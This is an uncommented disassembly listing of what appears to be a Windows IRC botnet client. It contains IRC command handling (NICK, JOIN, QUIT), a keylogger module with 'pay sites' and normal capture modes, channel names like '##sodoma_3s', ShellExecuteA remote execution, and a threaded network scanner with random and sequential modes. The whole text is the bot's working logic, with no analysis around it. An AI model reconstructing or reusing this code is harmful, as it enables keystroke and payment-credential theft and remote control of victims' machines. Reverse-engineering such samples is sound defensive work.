push esi
lea eax, [ebp+var_2DC]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_4362BC
push eax
call sub_4173AC
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_4182F0
push esi
push edi
lea eax, [ebp+var_2DC]
push offset dword_43605C
push eax
call sub_4173AC
add esp, 34h
inc [ebp+arg_24]
jmp loc_41545E
; ---------------------------------------------------------------------------
loc_413D13: ; CODE XREF: sub_40F6F1+45CA�j
lea eax, [ebp+var_2DC]
push offset dword_43601C
push eax
call sub_4173AC
pop ecx
pop ecx
jmp loc_41545E
; ---------------------------------------------------------------------------
loc_413D2B: ; CODE XREF: sub_40F6F1+45B9�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_40C061
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DC10
push edi
push offset dword_435FF4
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41792A
add esp, 24h
jmp loc_41545E
; ---------------------------------------------------------------------------
loc_413D72: ; CODE XREF: sub_40F6F1+238B�j
; sub_40F6F1+23A2�j
push offset aScreen ; "screen"
push edi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_413DD5
cmp [ebp+esi+var_8C], ebx
jz short loc_413DC2
push [ebp+esi+var_8C]
call sub_40851A
cmp eax, 1
pop ecx
jnz short loc_413DBB
push [ebp+esi+var_8C]
lea eax, [ebp+var_2DC]
push offset dword_435FB0
push eax
call sub_4173AC
add esp, 0Ch
jmp short loc_413DD5
; ---------------------------------------------------------------------------
loc_413DBB: ; CODE XREF: sub_40F6F1+46AB�j
push offset dword_435F74
jmp short loc_413DC7
; ---------------------------------------------------------------------------
loc_413DC2: ; CODE XREF: sub_40F6F1+4699�j
push offset dword_435F2C
loc_413DC7: ; CODE XREF: sub_40F6F1+46CF�j
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_413DD5: ; CODE XREF: sub_40F6F1+4690�j
; sub_40F6F1+46C8�j
push offset aDrivers ; "drivers"
push edi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_413E6C
mov [ebp+arg_0], ebx
loc_413DED: ; CODE XREF: sub_40F6F1+4766�j
lea eax, [ebp+var_75C]
push 1FFh
push eax
lea eax, [ebp+var_3F8]
push 0FFh
push eax
push [ebp+arg_0]
call dword_4413E8
test eax, eax
jz short loc_413E50
lea eax, [ebp+var_75C]
push eax
lea eax, [ebp+var_3F8]
push eax
lea eax, [ebp+var_15B0]
push [ebp+arg_0]
push offset dword_435EF0
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_15B0]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DC10
add esp, 28h
loc_413E50: ; CODE XREF: sub_40F6F1+471F�j
inc [ebp+arg_0]
cmp [ebp+arg_0], 0Ah
jl short loc_413DED
lea eax, [ebp+var_2DC]
push offset dword_435EBC
push eax
call sub_4173AC
pop ecx
pop ecx
loc_413E6C: ; CODE XREF: sub_40F6F1+46F3�j
push offset aFrame ; "frame"
push edi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_413F12
cmp [ebp+esi+var_8C], ebx
jz short loc_413EFF
cmp [ebp+esi+var_88], ebx
jz short loc_413EFF
cmp [ebp+esi+var_84], ebx
jz short loc_413EFF
mov eax, [ebp+esi+var_80]
cmp eax, ebx
jz short loc_413EFF
push eax
call sub_41791F
pop ecx
push eax
push [ebp+esi+var_84]
call sub_41791F
pop ecx
push eax
push [ebp+esi+var_88]
call sub_41791F
pop ecx
push eax
push [ebp+esi+var_8C]
call sub_408755
add esp, 10h
test eax, eax
jnz short loc_413EF8
push [ebp+esi+var_8C]
lea eax, [ebp+var_2DC]
push offset dword_435E78
push eax
call sub_4173AC
add esp, 0Ch
jmp short loc_413F12
; ---------------------------------------------------------------------------
loc_413EF8: ; CODE XREF: sub_40F6F1+47E8�j
push offset dword_435E34
jmp short loc_413F04
; ---------------------------------------------------------------------------
loc_413EFF: ; CODE XREF: sub_40F6F1+4797�j
; sub_40F6F1+47A0�j ...
push offset dword_435DEC
loc_413F04: ; CODE XREF: sub_40F6F1+480C�j
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_413F12: ; CODE XREF: sub_40F6F1+478A�j
; sub_40F6F1+4805�j
push offset aVideo ; "video"
push edi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_41455C
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_413FAB
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz short loc_413FAB
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz short loc_413FAB
mov edi, [ebp+esi+var_80]
cmp edi, ebx
jz short loc_413FAB
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_413FAB
push esi
call sub_41791F
pop ecx
push eax
push edi
call sub_41791F
pop ecx
push eax
push [ebp+arg_10]
call sub_41791F
pop ecx
push eax
push [ebp+arg_0]
call sub_41791F
pop ecx
push eax
push [ebp+arg_18]
call sub_40894E
add esp, 14h
test eax, eax
jnz short loc_413FA1
push [ebp+arg_18]
push offset dword_435DB0
jmp loc_4121DF
; ---------------------------------------------------------------------------
loc_413FA1: ; CODE XREF: sub_40F6F1+48A1�j
push offset dword_435D60
jmp loc_41454E
; ---------------------------------------------------------------------------
loc_413FAB: ; CODE XREF: sub_40F6F1+4842�j
; sub_40F6F1+4850�j ...
push offset dword_435D14
jmp loc_41454E
; ---------------------------------------------------------------------------
loc_413FB5: ; CODE XREF: sub_40F6F1+208C�j
; sub_40F6F1+20A3�j
push edi
push 1Bh
push offset aKeylog_0 ; "Keylog"
push offset a_n_z_m_Keylog_ ; ".n.z.m. (keylog.p.l.g) .»»."
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
jmp loc_41078F
; ---------------------------------------------------------------------------
loc_413FD6: ; CODE XREF: sub_40F6F1+205E�j
; sub_40F6F1+2075�j
push 1Bh
call sub_4170A0
test eax, eax
pop ecx
jle short loc_413FEC
push offset a_n_z_m_Keylo_0 ; ".n.z.m. (keylog.p.l.g) .»». Already ru"...
jmp loc_4115C4
; ---------------------------------------------------------------------------
loc_413FEC: ; CODE XREF: sub_40F6F1+48EF�j
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
push offset aPay ; "pay"
mov [ebp+var_464], eax
mov [ebp+var_46C], ebx
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_414068
mov esi, [ebp+esi+var_8C]
mov [ebp+var_46C], 1
cmp esi, ebx
jnz short loc_41404F
mov esi, offset aSodoma_3s ; "##sodoma_3s"
push offset byte_43C63C
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41404F
mov esi, [ebp+var_8C]
loc_41404F: ; CODE XREF: sub_40F6F1+4940�j
; sub_40F6F1+4956�j
push esi
lea eax, [ebp+var_4EC]
push 80h
push eax
call sub_41792A
push offset a_n_z_m_Keylo_1 ; ".n.z.m. (keylog.p.l.g) .»». Pay sites "...
jmp short loc_4140BB
; ---------------------------------------------------------------------------
loc_414068: ; CODE XREF: sub_40F6F1+492B�j
push edi
push offset aNormal_0 ; "normal"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_414138
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_4140A4
mov esi, offset aSodoma_3s ; "##sodoma_3s"
push offset byte_43C63C
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4140A4
mov esi, [ebp+var_8C]
loc_4140A4: ; CODE XREF: sub_40F6F1+4995�j
; sub_40F6F1+49AB�j
push esi
lea eax, [ebp+var_4EC]
push 80h
push eax
call sub_41792A
push offset a_n_z_m_Keylo_2 ; ".n.z.m. (keylog.p.l.g) .»». Normal key"...
loc_4140BB: ; CODE XREF: sub_40F6F1+4975�j
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 14h
lea eax, [ebp+var_2DC]
push ebx
push 1Bh
push eax
call sub_416E58
add esp, 0Ch
mov [ebp+var_4F0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_402368
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_4F0]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_414127
loc_414111: ; CODE XREF: sub_40F6F1+4A34�j
cmp [ebp+var_460], ebx
jnz loc_4115D2
push 32h
nop
call near ptr 7C802442h
jmp short loc_414111
; ---------------------------------------------------------------------------
loc_414127: ; CODE XREF: sub_40F6F1+4A1E�j
nop
call near ptr 7C910331h
push eax
push offset a_n_z_m_Keylo_3 ; ".n.z.m. (keylog.p.l.g) .»». Failed to "...
jmp loc_4145E5
; ---------------------------------------------------------------------------
loc_414138: ; CODE XREF: sub_40F6F1+4986�j
push offset a_n_z_m_Keylo_4 ; ".n.z.m. (keylog.p.l.g) .»». Unknow mod"...
jmp loc_412573
; ---------------------------------------------------------------------------
loc_414142: ; CODE XREF: sub_40F6F1+1D76�j
; sub_40F6F1+1D8D�j
push offset aR ; "r"
push edi
call sub_41823A
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_4141BC
mov ebx, 200h
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_4186EC
add esp, 0Ch
loc_41416B: ; CODE XREF: sub_40F6F1+4AA9�j
test eax, eax
jz short loc_41419C
push 1
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DC10
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_4186EC
add esp, 20h
jmp short loc_41416B
; ---------------------------------------------------------------------------
loc_41419C: ; CODE XREF: sub_40F6F1+4A7C�j
push esi
call sub_4180DC
push edi
lea eax, [ebp+var_2DC]
push offset dword_435B90
push eax
call sub_4173AC
add esp, 10h
jmp loc_411A54
; ---------------------------------------------------------------------------
loc_4141BC: ; CODE XREF: sub_40F6F1+4A62�j
push edi
push offset dword_435B60
loc_4141C2: ; CODE XREF: sub_40F6F1+4DF4�j
; sub_40F6F1+4DFE�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
jmp loc_411A33
; ---------------------------------------------------------------------------
loc_4141D6: ; CODE XREF: sub_40F6F1+1D48�j
; sub_40F6F1+1D5F�j
cmp [ebp+var_C], ebx
jz loc_415956
push edi
push [ebp+var_C]
call sub_417980
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_415956
push offset asc_4285AC ; "\n"
push esi
call sub_417A10
push esi
call sub_40B82D
add esp, 0Ch
test eax, eax
jnz short loc_414216
push offset dword_435B24
jmp loc_41454E
; ---------------------------------------------------------------------------
loc_414216: ; CODE XREF: sub_40F6F1+4B19�j
push esi
push offset dword_435AFC
jmp loc_41544F
; ---------------------------------------------------------------------------
loc_414221: ; CODE XREF: sub_40F6F1+1D1A�j
; sub_40F6F1+1D31�j
cmp [ebp+var_C], ebx
jz loc_415956
push edi
push [ebp+var_C]
call sub_417980
pop ecx
cmp eax, ebx
pop ecx
jz loc_415956
push eax
call sub_40AA6F
test eax, eax
pop ecx
jnz short loc_414252
push offset unk_435AD0
jmp loc_41454E
; ---------------------------------------------------------------------------
loc_414252: ; CODE XREF: sub_40F6F1+4B55�j
push offset dword_435AA4
jmp loc_41454E
; ---------------------------------------------------------------------------
loc_41425C: ; CODE XREF: sub_40F6F1+1CEC�j
; sub_40F6F1+1D03�j
push 7Fh
lea eax, [ebp+var_6EC]
push edi
push eax
call sub_4182F0
mov esi, [ebp+esi+var_8C]
add esp, 0Ch
cmp esi, ebx
jz short loc_41428B
push 7Fh
lea eax, [ebp+var_66C]
push esi
push eax
call sub_4182F0
add esp, 0Ch
loc_41428B: ; CODE XREF: sub_40F6F1+4B86�j
push 7Fh
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_4182F0
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_6F0], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
mov eax, [ebp+var_4]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push offset dword_435A7C
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 15h
push eax
call sub_416E58
add esp, 24h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6F0]
push ebx
push eax
push offset sub_40C1D5
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_414329
loc_414313: ; CODE XREF: sub_40F6F1+4C36�j
cmp [ebp+var_560], ebx
jnz loc_41545E
push 32h
nop
call near ptr 7C802442h
jmp short loc_414313
; ---------------------------------------------------------------------------
loc_414329: ; CODE XREF: sub_40F6F1+4C20�j
nop
call near ptr 7C910331h
push eax
push offset unk_435A30
jmp loc_41544F
; ---------------------------------------------------------------------------
loc_41433A: ; CODE XREF: sub_40F6F1+1CBE�j
; sub_40F6F1+1CD5�j
push ebx
push [ebp+var_8C]
push [ebp+arg_4]
push edi
call sub_4062F7
push edi
push offset dword_435A0C
jmp loc_4139F5
; ---------------------------------------------------------------------------
loc_414355: ; CODE XREF: sub_40F6F1+1C90�j
; sub_40F6F1+1CA7�j
push 14h
lea eax, [ebp+var_708]
push ebx
push eax
call sub_417430
push edi
lea eax, [ebp+var_6F4]
push offset dword_42433C
push eax
call sub_4173AC
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_5F0]
push 80h
push eax
call sub_41792A
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_5F0]
push eax
lea eax, [ebp+var_6F4]
push eax
lea eax, [ebp+var_2DC]
push offset dword_4359D8
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 12h
push eax
call sub_416E58
add esp, 40h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40CAB4
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_414425
loc_41440F: ; CODE XREF: sub_40F6F1+4D32�j
cmp [ebp+var_560], ebx
jnz loc_4157D0
push 32h
nop
call near ptr 7C802442h
jmp short loc_41440F
; ---------------------------------------------------------------------------
loc_414425: ; CODE XREF: sub_40F6F1+4D1C�j
nop
call near ptr 7C910331h
push eax
push offset dword_438038
jmp loc_4157C1
; ---------------------------------------------------------------------------
loc_414436: ; CODE XREF: sub_40F6F1+1C62�j
; sub_40F6F1+1C79�j
push edi
nop
call near ptr 7C831EABh
test eax, eax
jz short loc_414449
push edi
push offset dword_4359AC
jmp short loc_414454
; ---------------------------------------------------------------------------
loc_414449: ; CODE XREF: sub_40F6F1+4D4E�j
push offset dword_43649C
call sub_40A9AA
push eax
loc_414454: ; CODE XREF: sub_40F6F1+4D56�j
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41792A
add esp, 10h
jmp loc_411A33
; ---------------------------------------------------------------------------
loc_41446D: ; CODE XREF: sub_40F6F1+1C34�j
; sub_40F6F1+1C4B�j
push edi
call sub_41791F
push eax
call sub_415EA0
pop ecx
pop ecx
push 1
pop esi
cmp eax, esi
push edi
jnz short loc_41448A
push offset unk_435974
jmp short loc_41448F
; ---------------------------------------------------------------------------
loc_41448A: ; CODE XREF: sub_40F6F1+4D90�j
push offset unk_435930
loc_41448F: ; CODE XREF: sub_40F6F1+4D97�j
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_411A57
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DC10
add esp, 14h
jmp loc_411A57
; ---------------------------------------------------------------------------
loc_4144C8: ; CODE XREF: sub_40F6F1+1C06�j
; sub_40F6F1+1C1D�j
push ebx
push ebx
push edi
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_415B93
add esp, 18h
cmp eax, 1
push edi
jnz short loc_4144EA
push offset unk_4358FC
jmp loc_4141C2
; ---------------------------------------------------------------------------
loc_4144EA: ; CODE XREF: sub_40F6F1+4DED�j
push offset unk_4358BC
jmp loc_4141C2
; ---------------------------------------------------------------------------
loc_4144F4: ; CODE XREF: sub_40F6F1+1BD8�j
; sub_40F6F1+1BEF�j
push edi
call dword_4413F8 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_41452E
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call dword_441370 ; gethostbyaddr
cmp eax, ebx
jz short loc_414549
push dword ptr [eax]
loc_414517: ; CODE XREF: sub_40F6F1+4E56�j
push edi
lea eax, [ebp+var_2DC]
push offset dword_435890
push eax
call sub_4173AC
add esp, 10h
jmp short loc_41455C
; ---------------------------------------------------------------------------
loc_41452E: ; CODE XREF: sub_40F6F1+4E10�j
push edi
call dword_44143C ; gethostbyname
cmp eax, ebx
jz short loc_414549
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_441444 ; inet_ntoa
push eax
jmp short loc_414517
; ---------------------------------------------------------------------------
loc_414549: ; CODE XREF: sub_40F6F1+4E22�j
; sub_40F6F1+4E46�j
push offset dword_435858
loc_41454E: ; CODE XREF: sub_40F6F1+3F25�j
; sub_40F6F1+40B1�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_41455C: ; CODE XREF: sub_40F6F1+2AFD�j
; sub_40F6F1+3C34�j ...
cmp [ebp+var_8], ebx
jnz loc_41545E
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DC10
add esp, 14h
jmp loc_41545E
; ---------------------------------------------------------------------------
loc_414586: ; CODE XREF: sub_40F6F1+1BAA�j
; sub_40F6F1+1BC1�j
push 7Fh
push edi
push [ebp+arg_14]
call sub_4182F0
push edi
lea eax, [ebp+var_2DC]
push offset dword_435824
push eax
call sub_4173AC
add esp, 18h
jmp loc_4115D2
; ---------------------------------------------------------------------------
loc_4145AB: ; CODE XREF: sub_40F6F1+1B7C�j
; sub_40F6F1+1B93�j
push 5
push ebx
push ebx
push edi
push offset aOpen ; "open"
push ebx
call dword_44132C ; ShellExecuteA
test eax, eax
push edi
jz short loc_4145CB
push offset unk_4357E8
jmp loc_4141C2
; ---------------------------------------------------------------------------
loc_4145CB: ; CODE XREF: sub_40F6F1+4ECE�j
push offset unk_4357A4
jmp loc_4141C2
; ---------------------------------------------------------------------------
loc_4145D5: ; CODE XREF: sub_40F6F1+1B4E�j
; sub_40F6F1+1B65�j
mov al, [edi]
mov byte_42ECF8, al
movsx eax, byte ptr [edi]
push eax
push offset dword_435770
loc_4145E5: ; CODE XREF: sub_40F6F1+1E9F�j
; sub_40F6F1+1EC9�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
jmp loc_4115D2
; ---------------------------------------------------------------------------
loc_4145F9: ; CODE XREF: sub_40F6F1+1B20�j
; sub_40F6F1+1B37�j
push edi
call sub_41791F
test eax, eax
pop ecx
jle loc_415956
push edi
call sub_41791F
cmp eax, 5DCh
pop ecx
jge loc_415956
push ebx
push ebx
lea eax, [ebp+var_B8]
push 1
push eax
push [ebp+arg_4]
call sub_4162D6
push eax
lea eax, [ebp+var_2DC]
push offset dword_436208
push eax
call sub_4173AC
add esp, 20h
jmp loc_41393F
; ---------------------------------------------------------------------------
loc_414647: ; CODE XREF: sub_40F6F1+1AF2�j
; sub_40F6F1+1B09�j
push edi
call sub_41791F
test eax, eax
pop ecx
jle loc_40FAB8
push edi
call sub_41791F
cmp eax, 5DCh
pop ecx
jge loc_40FAB8
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_41791F
imul eax, 234h
pop ecx
push dword_446E1C[eax]
call sub_40DBCA
pop ecx
pop ecx
push 1F4h
nop
call near ptr 7C802442h
push edi
call sub_41791F
imul eax, 234h
pop ecx
push dword_446E1C[eax]
call dword_441450 ; closesocket
push [ebp+var_10]
push edi
call sub_41791F
imul eax, 234h
pop ecx
push dword_446E24[eax]
nop
call near ptr 7C81CE03h
push edi
call sub_41791F
imul eax, 234h
push edi
mov dword_446E24[eax], ebx
call sub_41791F
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_446C10[eax], bl
jmp loc_40FAB8
; ---------------------------------------------------------------------------
loc_4146F2: ; CODE XREF: sub_40F6F1+1AC4�j
; sub_40F6F1+1ADB�j
push edi
push offset aAll ; "all"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_414721
call sub_417021
cmp eax, ebx
jle short loc_414717
push eax
push offset dword_435724
jmp loc_412258
; ---------------------------------------------------------------------------
loc_414717: ; CODE XREF: sub_40F6F1+5019�j
push offset dword_4356EC
jmp loc_412573
; ---------------------------------------------------------------------------
loc_414721: ; CODE XREF: sub_40F6F1+5010�j
mov eax, [ebp+var_C0]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_40FAB8
lea eax, [ebp+edi*4+var_94]
mov [ebp+arg_24], eax
loc_41473D: ; CODE XREF: sub_40F6F1+50BD�j
mov eax, [ebp+arg_24]
mov esi, [eax]
cmp esi, ebx
jz loc_40FAB8
push esi
call sub_41791F
push eax
call sub_416F93
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_414764
push offset dword_4356B8
jmp short loc_414769
; ---------------------------------------------------------------------------
loc_414764: ; CODE XREF: sub_40F6F1+506A�j
push offset dword_43567C
loc_414769: ; CODE XREF: sub_40F6F1+5071�j
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_414799
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DC10
add esp, 14h
loc_414799: ; CODE XREF: sub_40F6F1+508A�j
lea eax, [ebp+var_2DC]
push eax
call sub_40C4F7
add [ebp+arg_24], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_41473D
jmp loc_40FAB8
; ---------------------------------------------------------------------------
loc_4147B5: ; CODE XREF: sub_40F6F1+1A96�j
; sub_40F6F1+1AAD�j
cmp [ebp+var_C], ebx
jz loc_415956
push edi
push [ebp+var_C]
call sub_417980
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_415956
push esi
push offset dword_425A78
push [ebp+arg_4]
call sub_40DBCA
push esi
push offset dword_435654
jmp loc_413B21
; ---------------------------------------------------------------------------
loc_4147EC: ; CODE XREF: sub_40F6F1+1A68�j
; sub_40F6F1+1A7F�j
push edi
push offset dword_436138
push [ebp+arg_4]
call sub_40DBCA
push edi
push offset dword_435624
jmp loc_413B21
; ---------------------------------------------------------------------------
loc_414805: ; CODE XREF: sub_40F6F1+1A3A�j
; sub_40F6F1+1A51�j
push [ebp+esi+var_8C]
push edi
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40DBCA
push edi
push offset dword_4355F4
jmp loc_4139F5
; ---------------------------------------------------------------------------
loc_414825: ; CODE XREF: sub_40F6F1+1A0C�j
; sub_40F6F1+1A23�j
push edi
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40DBCA
push edi
push offset dword_4355C0
jmp loc_413B21
; ---------------------------------------------------------------------------
loc_41483E: ; CODE XREF: sub_40F6F1+19CF�j
; sub_40F6F1+19E6�j
mov al, byte_42ED3A
mov [ebp+arg_24], ebx
cmp al, bl
mov edx, offset byte_42ED3A
jz loc_40FAB8
mov ecx, edx
loc_414855: ; CODE XREF: sub_40F6F1+516C�j
inc [ebp+arg_24]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_414855
cmp al, bl
jz loc_40FAB8
mov [ebp+arg_0], edx
loc_41486A: ; CODE XREF: sub_40F6F1+542C�j
push 8
call sub_4170A0
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_24]
add eax, ecx
cmp eax, 3E8h
jle short loc_4148B7
push ecx
lea eax, [ebp+var_2DC]
push offset unk_436A90
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push edi
call sub_40DC10
add esp, 20h
jmp loc_414B14
; ---------------------------------------------------------------------------
loc_4148B7: ; CODE XREF: sub_40F6F1+5193�j
or [ebp+var_314], 0FFFFFFFFh
cmp dword_428BF8, ebx
mov [ebp+var_318], 0FAh
mov [ebp+var_32C], 5
mov [ebp+var_328], ebx
mov [ebp+arg_24], ebx
jz short loc_414924
mov esi, offset dword_428BF8
loc_4148E8: ; CODE XREF: sub_40F6F1+5215�j
mov eax, [ebp+arg_0]
add eax, 0FFFFFFF6h
push eax
lea eax, [esi-28h]
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_41490A
inc [ebp+arg_24]
add esi, 3Ch
cmp [esi], ebx
jnz short loc_4148E8
jmp short loc_414924
; ---------------------------------------------------------------------------
loc_41490A: ; CODE XREF: sub_40F6F1+520B�j
mov eax, [ebp+arg_24]
mov ecx, eax
mov [ebp+var_314], eax
imul ecx, 3Ch
mov ecx, dword_428BF8[ecx]
mov [ebp+var_330], ecx
loc_414924: ; CODE XREF: sub_40F6F1+51F0�j
; sub_40F6F1+5217�j
cmp [ebp+var_330], ebx
jz loc_414B28
push 10h
lea eax, [ebp+arg_18]
pop esi
push eax
lea eax, [ebp+var_2EC]
push eax
push edi
mov [ebp+arg_18], esi
call dword_44135C ; getsockname
mov al, [ebp+var_9C7]
push esi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2E8], eax
push [ebp+var_2E8]
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_444]
push eax
call sub_4182F0
xor eax, eax
cmp [ebp+var_9C7], bl
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_444]
push eax
call sub_4185F0
add esp, 14h
cmp esi, ebx
mov byte ptr [ebp+arg_4+3], bl
jle short loc_4149C4
loc_4149A2: ; CODE XREF: sub_40F6F1+52D1�j
cmp eax, ebx
jz short loc_4149C4
mov byte ptr [eax], 78h
lea eax, [ebp+var_444]
push 30h
push eax
call sub_4185F0
inc byte ptr [ebp+arg_4+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_4+3]
cmp ecx, esi
jl short loc_4149A2
loc_4149C4: ; CODE XREF: sub_40F6F1+52AF�j
; sub_40F6F1+52B3�j
mov eax, [ebp+var_4]
push [ebp+var_8C]
mov [ebp+var_30C], eax
mov eax, [ebp+var_8]
mov [ebp+var_308], eax
mov esi, 80h
lea eax, [ebp+var_434]
push esi
push eax
mov [ebp+var_304], 1
mov [ebp+var_334], edi
call sub_41792A
push offset byte_43C63C
push offset aSodoma_3e ; "##sodoma_3e"
call sub_4177D0
add esp, 14h
test eax, eax
jz short loc_414A2B
push offset aSodoma_3e ; "##sodoma_3e"
lea eax, [ebp+var_3B4]
push esi
push eax
call sub_41792A
add esp, 0Ch
jmp short loc_414A31
; ---------------------------------------------------------------------------
loc_414A2B: ; CODE XREF: sub_40F6F1+5321�j
mov [ebp+var_3B4], bl
loc_414A31: ; CODE XREF: sub_40F6F1+5338�j
cmp [ebp+var_304], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_414A43
mov eax, offset aSequential ; "Sequential"
loc_414A43: ; CODE XREF: sub_40F6F1+534B�j
push [ebp+var_318]
lea ecx, [ebp+var_444]
push [ebp+var_328]
push [ebp+var_32C]
push [ebp+var_330]
push ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_435548
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_416E58
add esp, 2Ch
mov [ebp+var_324], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_444]
push ebx
push eax
push offset sub_4078E6
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_324]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_414ACD
loc_414ABB: ; CODE XREF: sub_40F6F1+53DA�j
cmp [ebp+var_300], ebx
jnz short loc_414AE8
push 32h
nop
call near ptr 7C802442h
jmp short loc_414ABB
; ---------------------------------------------------------------------------
loc_414ACD: ; CODE XREF: sub_40F6F1+53C8�j
nop
call near ptr 7C910331h
push eax
lea eax, [ebp+var_2DC]
push offset unk_43693C
push eax
call sub_4173AC
add esp, 0Ch
loc_414AE8: ; CODE XREF: sub_40F6F1+53D0�j
cmp [ebp+var_8], ebx
jnz short loc_414B07
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push edi
call sub_40DC10
add esp, 14h
loc_414B07: ; CODE XREF: sub_40F6F1+53FA�j
lea eax, [ebp+var_2DC]
push eax
call sub_40C4F7
pop ecx
loc_414B14: ; CODE XREF: sub_40F6F1+51C1�j
add [ebp+arg_0], 0Bh
